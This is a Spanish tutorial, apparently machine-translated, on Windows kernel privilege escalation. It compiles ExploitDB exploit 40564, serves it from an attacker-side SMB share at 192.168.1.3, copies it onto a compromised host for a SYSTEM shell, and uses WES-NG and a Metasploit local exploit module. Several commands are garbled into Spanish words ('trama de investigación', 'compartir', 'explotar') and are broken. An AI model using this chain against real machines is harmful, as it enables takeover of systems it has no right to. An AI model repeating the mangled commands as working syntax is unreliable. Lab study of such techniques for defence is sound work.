Escalada de privilegios de Windows: explotación del kernel

Escalada de privilegios de Windows: explotación del kernel - Codelivly

 

Como esta serie se dedicó a la elevación de privilegios de Windows, escribo este artículo para explicar la práctica de los comandos para la explotación del modo kernel.

¿Qué es un núcleo?

Un núcleo es un programa de computadora que sirve como núcleo o corazón de un sistema operativo. Se encarga de la gestión de la memoria, la gestión de tareas y la gestión del disco.

Un sistema operativo tiene los siguientes espacios separados:

  • Espacio del núcleo: Un núcleo generalmente se mantiene y se carga en una región de memoria separada llamada espacio de núcleo protegido. Está protegido contra el acceso de programas de aplicación o componentes menos críticos del sistema operativo.
  • Área de usuario: El sistema operativo (SO) es el software que actúa como puente entre los componentes de hardware y el usuario final. La memoria del espacio de usuario es utilizada por programas de aplicación como un navegador, un procesador de textos y un reproductor de audio y video.

Técnicas de escalada de privilegios del kernel

Existe una vulnerabilidad de elevación de privilegios en el kernel de Windows en el host remoto. Si se explota con éxito, un atacante autorizado localmente puede ejecutar un programa en modo kernel especialmente diseñado y tomar el control de la máquina.
Táctico:
Escalada de privilegios

Plataformas: las ventanas

requisitos previos

Equipo de destino: ventanas 10

Máquina de ataque: Kali-Linux

Condición: Comprometer la máquina de destino con acceso de privilegio bajo usando Metasploit o Netcat, etc.

Objetivo: Eleve los privilegios de NT Authority/SYSTEM para un usuario con privilegios bajos explotando el kernel.

Cacería de núcleos vulnerables

Un atacante siempre buscará la elevación de privilegios si se construye un núcleo vulnerable enumerado. Esto podría ser posible mediante la inyección de un script de python o powershell. Enumera según el número de compilación y puede devolver la ID de CVE para explotar fácilmente la máquina y obtener administración. Acceso.

Obtenga más información al respecto en Window-Privilege-Escalation-Automated-Script

Explotando el kernel usando ExploitDB

Una vez que el atacante tiene una conexión inversa, puede enumerar el kernel construido como se muestra en la imagen a continuación.

Esto lo ayudará a descubrir un exploit relacionado si es vulnerable.

Para la versión de kernel asociada, encontramos que es vulnerable desde MS11-046 (CVE: 2011-1249).

Lo mismo se puede enumerar usando searchploit, que también se considera una versión fuera de línea de ExploitDB. Como se muestra a continuación, podemos descargar el mismo exploit desde su versión sin conexión.

trama de investigación 40564

i686-w64-mingw32-gcc 40564.c –o 40564.exe –lws2_32

Comencemos el servicio SMB Share en una nueva terminal usando el script impacket python como se muestra a continuación:

compartir impacket-smbserver $(contraseña)

Esto nos ayudará a importar el exploit dentro de shells comprometidos usando el comando de copia:

copiar \\192.168.1.3\share\40564.exe

Una vez que se descarga el exploit, podemos ejecutar este programa para obtener un shell de privilegios como Autoridad/Sistema NT.

Minería de núcleos usando Metasploit

Una vez que haya enumerado el kernel construido, puede usar Google para obtener el exploit disponible mientras puede descargar Windows Exploit Suggester - Next Generation (WES-NG) en su Kali Linux, que buscará el exploit disponible para el kernel vulnerable construido. Puede descargar este script de la biblioteca de Github.

clon de git https://github.com/bitsadmin/wesng

cd wesng

Nota: Hay dos opciones para comprobar si faltan parches: a. Ejecutemisingkbs.vbs en el host para Windows para determinar los parches faltantes b. Use la herramienta systeminfo.exe incorporada de Windows para obtener información del sistema del sistema local o un sistema remoto usando systeminfo /S MyRemoteHost, y rediríjalo a un archivo: información del sistema > información del sistema.txt

Ya que guardamos la salida de systeminfo en un archivo de texto y lo llamamos systeminfo.txt. Además, utilizamos esta información para ejecutar el wes.py guion

python wes.py /root/systeminfo.txt

Como resultado, intentará determinar los parches faltantes e informar sobre las vulnerabilidades disponibles y el impacto del riesgo. En la imagen a continuación, puede observar que tiene un enlace puntiagudo para el exploit disponible en exploit db.

Esta vez usaremos Metasploit para post-explotación y buscaremos un shell de privilegios con NT Authority Privileges.

use exploit/windows/local/ms16_014_wmi_rec_notif

establecer sesión 1

explotar

En una ejecución exitosa, otorgará un shell para privilegios administrativos.

Autor: Aarti Singh es investigadora y escritora técnica en Hacking Articles, consultora de seguridad de la información, entusiasta de las redes sociales y los dispositivos.

Si quieres conocer otros artículos parecidos a Escalada de privilegios de Windows: explotación del kernel puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas